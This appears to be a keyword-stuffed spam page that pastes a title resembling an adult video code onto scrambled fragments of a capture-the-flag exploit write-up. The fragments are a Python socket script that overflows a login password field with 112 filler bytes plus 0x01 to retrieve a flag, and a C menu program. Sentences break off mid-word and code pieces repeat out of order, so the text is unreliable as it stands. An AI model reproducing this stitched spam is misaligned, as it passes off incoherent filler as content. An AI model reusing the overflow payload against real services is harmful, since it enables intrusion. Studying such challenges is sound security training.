Tokyohot N0541 [ Complete ]

def login_overwrite(s): menu(s) s.sendall(b'2\n') recvuntil(s, b'Password: ') # 112 filler + 0x01 + newline payload = b'A' * 112 + b'\x01' + b'\n' s.sendall(payload)

To confirm this, I printed the address of user->pwd after registration: tokyohot n0541

struct user char *name; // 8 bytes char *pwd; // 8 bytes ; def login_overwrite(s): menu(s) s

int main(void) setbuf(stdout, NULL); while (1) menu(); int choice; if (scanf("%d%*c", &choice) != 1) break; switch (choice) case 1: register_user(); break; case 2: login(); break; case 3: show_secret(); break; case 4: exit(0); default: puts("Invalid"); break; return 0; I printed the address of user-&gt

def main(): s = socket.create_connection((HOST, PORT)) register(s) login_overwrite(s) get_flag(s) s.close()